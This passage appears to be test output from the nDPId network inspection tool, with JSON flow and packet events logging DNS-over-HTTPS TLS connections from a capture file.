+02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"} +01084{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysU